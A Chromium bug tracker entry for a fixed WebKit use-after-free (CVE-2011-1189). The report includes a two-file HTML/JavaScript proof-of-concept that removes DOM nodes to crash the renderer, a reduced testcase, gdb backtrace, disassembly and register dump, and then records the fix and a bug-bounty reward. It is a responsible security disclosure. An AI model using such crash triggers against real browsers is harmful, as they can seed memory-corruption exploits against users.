My favorites | Sign in
Project Home Downloads Wiki Issues Code Search
New issue   Search
for
  Advanced search   Search tips   Subscriptions
Issue 70027: Stale text node in linebox due to failure to dirty linebox when that text child is dirtied
1 person starred this issue and may be notified of changes. Back to list
Status:  Fixed
Owner:  infe...@chromium.org
Closed:  Feb 2011
Cc:  jamesr@chromium.org

Restricted
  • Only users with EditIssue permission may comment.


Sign in to add a comment
 
Reported by MartyBar...@gmail.com, Jan 18, 2011
VULNERABILITY DETAILS
Under certain circumstances, when removing DOM nodes from a DOM tree in an HTML document included on a second page via an iframe, Chromium will crash (caused by a jump to null).

VERSION
Chrome Version: Tested in Google Chrome 8.0.552.237 stable, debugging done in Chromium 8.0.552.224 Ubuntu 10.04
Operating System: Ubuntu 10.04 (64-bit)

REPRODUCTION CASE
Two files are needed to reproduce this bug. Both are attached as well as included below.

The first file, outer.html, simply creates a 100x100 iframe with a src of inner.html. To reproduce the crash, this file should opened in the browser. It is shown below.

<html>
<head><title>Crash PoC - Outer</title></head>
<body>
<iframe width="100" height="100" src="inner.html"></iframe>
</body>
</html>

The second file, inner.html, is shown below.

<html>
<head><title>Crash PoC - Inner</title></head>
<body onload="boom();">
<audio>a</audio>
<frame>a</frame>
<center></center>
<font id="font"></font>
<img id="img" />
<textflow>aaaaaaaaaaaaaaaaaaaa<bgsound /></textflow>
<wbr id="wbr" />
<spot>aaa<bq>aaaaaaaaaaaaa<table></table></bq></spot>
<abbr id="abbr"></abbr>
<fieldset id="fieldset">a</fieldset>
<script type="text/javascript">
function reference(domNode) {
  this.domNode = domNode;
}

function walk(a, currentPrefix, index, domNode) {
  if(domNode == null) return;
  newPrefix = currentPrefix + "_" + index
  walk(a, currentPrefix, index + 1, domNode.nextSibling);
  walk(a, newPrefix, 0, domNode.firstChild);
  a[newPrefix] = new reference(domNode);
}

function clear() {
  var a = new Array();
  walk(a, "", 0, document.body);
  for(key in a) {
    document.body.offsetTop;
    a[key].domNode.parentNode.removeChild(a[key].domNode);
  }
}

function boom() {
  var tn = document.getElementById('font'); tn.parentNode.removeChild(tn); document.getElementById('wbr').appendChild(tn);
  var tn = document.getElementById('fieldset'); tn.parentNode.removeChild(tn); document.getElementById('img').appendChild(tn);
  document.getElementById('img').appendChild(document.getElementById('abbr').cloneNode(false));
  window.setTimeout("clear();", 0);
}
</script>
</body>
</html>

The walk and reference functions are helpers for the clear function, which removes all nodes under document.body from their parents.

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab

A shortened version of the trace through the program in gdb is included below. The full trace is attached.

$ chromium-browser --debug --single-process outer.html 
# Env:
#     LD_LIBRARY_PATH=/usr/lib/chromium-browser
#                PATH=/usr/lib/chromium-browser:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
#            GTK_PATH=
# CHROMIUM_USER_FLAGS=
#      CHROMIUM_FLAGS=
/usr/bin/gdb /usr/lib/chromium-browser/chromium-browser -x /tmp/chromiumargs.FdgvnE
GNU gdb (GDB) 7.1-ubuntu
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /usr/lib/chromium-browser/chromium-browser...Reading symbols from /usr/lib/debug/usr/lib/chromium-browser/chromium-browser...done.
done.
(gdb) run
Starting program: /usr/lib/chromium-browser/chromium-browser --single-process outer.html

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fffe3c61700 (LWP 18254)]
0x0000000000000000 in ?? ()
(gdb) bt
#0  0x0000000000000000 in ?? ()
#1  0x00007ffff68ea489 in WebCore::RenderBlock::requiresLineBox (it=..., 
    isLineEmpty=true, previousLineBrokeCleanly=false)
    at third_party/WebKit/WebCore/rendering/RenderBlockLineLayout.cpp:1222
#2  0x00007ffff68f0400 in WebCore::RenderBlock::skipLeadingWhitespace (
    this=0x7ffff8f7aa60, resolver=..., firstLine=<value optimized out>, 
    isLineEmpty=<value optimized out>, previousLineBrokeCleanly=false, 
    lastFloatFromPreviousLine=<value optimized out>)
    at third_party/WebKit/WebCore/rendering/RenderBlockLineLayout.cpp:1287
#3  0x00007ffff68f0e33 in WebCore::RenderBlock::findNextLineBreak (
    this=0x7ffff8f7aa60, resolver=<value optimized out>, 
    firstLine=<value optimized out>, isLineEmpty=<value optimized out>, 
    previousLineBrokeCleanly=<value optimized out>, 
    hyphenated=@0x7fffe3c5fa49, clear=0x7fffe3c5fa34, 
    lastFloatFromPreviousLine=0x0)
    at third_party/WebKit/WebCore/rendering/RenderBlockLineLayout.cpp:1409
#4  0x00007ffff68f44bf in WebCore::RenderBlock::layoutInlineChildren (
    this=0x7ffff8f7aa60, relayoutChildren=<value optimized out>, 
    repaintLogicalTop=@0x7fffe3c5fb6c, repaintLogicalBottom=@0x7fffe3c5fb68)
    at third_party/WebKit/WebCore/rendering/RenderBlockLineLayout.cpp:664
#5  0x00007ffff68e8ad8 in WebCore::RenderBlock::layoutBlock (
    this=0x7ffff8f7aa60, relayoutChildren=false, pageHeight=0)
    at third_party/WebKit/WebCore/rendering/RenderBlock.cpp:1211
---Type <return> to continue, or q <return> to quit---
<trimmed>
(gdb) frame 1
#1  0x00007ffff68ea489 in WebCore::RenderBlock::requiresLineBox (it=..., 
    isLineEmpty=true, previousLineBrokeCleanly=false)
    at third_party/WebKit/WebCore/rendering/RenderBlockLineLayout.cpp:1222
1222	third_party/WebKit/WebCore/rendering/RenderBlockLineLayout.cpp: No such file or directory.
	in third_party/WebKit/WebCore/rendering/RenderBlockLineLayout.cpp
(gdb) disassemble
Dump of assembler code for function _ZN7WebCore11RenderBlock15requiresLineBoxERKNS_14InlineIteratorEbb:
   0x00007ffff68ea430 <+0>:	mov    %rbx,-0x20(%rsp)
   0x00007ffff68ea435 <+5>:	mov    %rbp,-0x18(%rsp)
   0x00007ffff68ea43a <+10>:	mov    %rdi,%rbx
   0x00007ffff68ea43d <+13>:	mov    %r12,-0x10(%rsp)
   0x00007ffff68ea442 <+18>:	mov    %r13,-0x8(%rsp)
   0x00007ffff68ea447 <+23>:	sub    $0x28,%rsp
   0x00007ffff68ea44b <+27>:	mov    0x8(%rdi),%rdi
   0x00007ffff68ea44f <+31>:	mov    %esi,%r12d
   0x00007ffff68ea452 <+34>:	mov    %edx,%ebp
   0x00007ffff68ea454 <+36>:	movzbl 0x30(%rdi),%eax
   0x00007ffff68ea458 <+40>:	test   $0x20,%al
   0x00007ffff68ea45a <+42>:	jne    0x7ffff68ea460 <_ZN7WebCore11RenderBlock15requiresLineBoxERKNS_14InlineIteratorEbb+48>
   0x00007ffff68ea45c <+44>:	test   $0x40,%al
   0x00007ffff68ea45e <+46>:	je     0x7ffff68ea480 <_ZN7WebCore11RenderBlock15requiresLineBoxERKNS_14InlineIteratorEbb+80>
   0x00007ffff68ea460 <+48>:	xor    %ebp,%ebp
   0x00007ffff68ea462 <+50>:	mov    %ebp,%eax
   0x00007ffff68ea464 <+52>:	mov    0x8(%rsp),%rbx
   0x00007ffff68ea469 <+57>:	mov    0x10(%rsp),%rbp
   0x00007ffff68ea46e <+62>:	mov    0x18(%rsp),%r12
---Type <return> to continue, or q <return> to quit---
   0x00007ffff68ea473 <+67>:	mov    0x20(%rsp),%r13
   0x00007ffff68ea478 <+72>:	add    $0x28,%rsp
   0x00007ffff68ea47c <+76>:	retq   
   0x00007ffff68ea47d <+77>:	nopl   (%rax)
   0x00007ffff68ea480 <+80>:	mov    (%rdi),%rax
   0x00007ffff68ea483 <+83>:	callq  *0x150(%rax)
=> 0x00007ffff68ea489 <+89>:	test   %al,%al
   0x00007ffff68ea48b <+91>:	jne    0x7ffff68ea528 <_ZN7WebCore11RenderBlock15requiresLineBoxERKNS_14InlineIteratorEbb+248>
   0x00007ffff68ea491 <+97>:	mov    0x8(%rbx),%rdi
   0x00007ffff68ea495 <+101>:	mov    0x8(%rdi),%rax
<trimmed>
(gdb) i r
rax            0x7ffff90c93c0	140737371739072
rbx            0x7fffe3c5f7f0	140737014790128
rcx            0x0	0
rdx            0x0	0
rsi            0x1	1
rdi            0x7ffff8f7ae80	140737370369664
rbp            0x0	0x0
rsp            0x7fffe3c5f100	0x7fffe3c5f100
r8             0x0	0
r9             0x0	0
r10            0x0	0
r11            0x3c	60
r12            0x1	1
r13            0x0	0
r14            0x45	69
r15            0x0	0
rip            0x7ffff68ea489	0x7ffff68ea489 <WebCore::RenderBlock::requiresLineBox(WebCore::InlineIterator const&, bool, bool)+89>
eflags         0x10246	[ PF ZF IF RF ]
cs             0x33	51
ss             0x2b	43
ds             0x0	0
es             0x0	0
---Type <return> to continue, or q <return> to quit---
fs             0x0	0
gs             0x0	0

outer.html
136 bytes   View   Download
inner.html
1.3 KB   View   Download
gdb.txt
17.3 KB   View   Download
Jan 20, 2011
#1 chromium.cdn@gmail.com
it.obj points to a freed CachedResourceClient so this is high severity.
Summary: Stale pointer in WebCore::RenderBlock::requiresLineBox
Status: Available
Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit Mstone-10 SecSeverity-High
Jan 27, 2011
#3 kerz@google.com
Move to M11 from M10, as we've now branched.  If you believe this bug was moved in error, please come talk to me.
Labels: -Mstone-10 Mstone-11 MovedFrom-10
Jan 27, 2011
#4 jsc...@chromium.org
Moving back to m9.
Labels: -Mstone-11 -MovedFrom-10 Mstone-9
Jan 28, 2011
#5 jsc...@chromium.org
CC'ing @jamesr on the off-chance he has a thought to contribute.
Cc: jam...@chromium.org
Feb 22, 2011
#6 infe...@chromium.org
Reduced testcase::

outer.html
----
<iframe width="100" src="inner.html">

inner.html
----
<body onload="boom();">
<audio>a</audio>a
<center></center>
aaaaaaaaaaaaaaaaaaa
<wbr id="wbr">
<span>aaaaaaaaaaaaa
<script>
function reference(domNode) {
  this.domNode = domNode;
}
function walk(a, currentPrefix, index, domNode) {
  if(domNode == null) return;
  newPrefix = currentPrefix + "_" + index
  walk(a, currentPrefix, index + 1, domNode.nextSibling);
  walk(a, newPrefix, 0, domNode.firstChild);
  a[newPrefix] = new reference(domNode);
}
function clear() {
  var a = new Array();
  walk(a, "", 0, document.body);
  for(key in a) {
    document.body.offsetTop;
    a[key].domNode.parentNode.removeChild(a[key].domNode);
  }
}
function boom() {
  var fnt = document.createElement('font');
  document.getElementById('wbr').appendChild(fnt);
  window.setTimeout("clear();", 0);
}
</script>
Feb 25, 2011
#7 infe...@chromium.org
I have a fix! filed webkit bug - https://bugs.webkit.org/show_bug.cgi?id=55206
Summary: Stale text node in linebox due to failure to dirty linebox when that text child is dirtied
Status: Assigned
Owner: infe...@chromium.org
Feb 25, 2011
#8 infe...@chromium.org
Committed r79689: <http://trac.webkit.org/changeset/79689>
Status: WillMerge
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify reward-topanel
Feb 28, 2011
#9 jsc...@chromium.org
(No comment was entered for this change.)
Labels: ApprovedForMerge
Feb 28, 2011
#10 chromium.cdn@gmail.com
merged to m10 as http://trac.webkit.org/changeset/79910
Status: FixUnreleased
Labels: -Mstone-9 Mstone-10
Mar 2, 2011
#11 scarybea...@gmail.com
@MartyBarbella -- congrats! This bug provisionally qualifies for a $1000 Chromium Security Reward. You seem to be hearing that a lot lately :D
Thanks for taking the trouble to try and keep the repros minimal, and for including stack, register and asm analysis. It's factors like those that cause us to reward at the $1000 level.

----
Boilerplate text:
Please do NOT publicly disclose details until a fix has been released to all our
users. Early public disclosure may cancel the provisional reward.
Also, please be considerate about disclosure when the bug affects a core library
that may be used by other products.
Please do NOT share this information with third parties who are not directly
involved in fixing the bug. Doing so may cancel the provisional reward.
Please be honest if you have already disclosed anything publicly or to third parties.
----
Labels: -reward-topanel reward-1000 reward-unpaid
Mar 9, 2011
#12 scarybea...@gmail.com
(No comment was entered for this change.)
Labels: CVE-2011-1189
Mar 14, 2011
#13 scarybea...@gmail.com
Invoice finalized; payment is in e-payment system.
Labels: -reward-unpaid
Mar 21, 2011
#14 jsc...@chromium.org
(No comment was entered for this change.)
Labels: Type-Security
Oct 4, 2011
#15 jsc...@chromium.org
Batch update.
Labels: SecImpacts-Stable
Apr 18, 2012
#16 jsc...@chromium.org
Lifting view restrictions.
Labels: -Restrict-View-SecurityNotify
Apr 18, 2012
#17 jsc...@chromium.org
(No comment was entered for this change.)
Status: Fixed
Oct 13, 2012
#18 bugdro...@chromium.org
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Labels: Restrict-AddIssueComment-Commit
Mar 9, 2013
#19 bugdro...@chromium.org
(No comment was entered for this change.)
Labels: -Area-WebKit -SecSeverity-High -Mstone-10 -Type-Security -SecImpacts-Stable Cr-Content Security-Impact-Stable Type-Bug-Security Security-Severity-High M-10
Mar 13, 2013
#20 bugdro...@chromium.org
(No comment was entered for this change.)
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Mar 21, 2013
#21 bugdro...@chromium.org
(No comment was entered for this change.)
Labels: -Security-Severity-High Security_Severity-High
Mar 21, 2013
#22 bugdro...@chromium.org
(No comment was entered for this change.)
Labels: -Security-Impact-Stable Security_Impact-Stable
Apr 5, 2013
#23 bugdro...@chromium.org
(No comment was entered for this change.)
Labels: -Cr-Content Cr-Blink
Sign in to add a comment

Powered by Google Project Hosting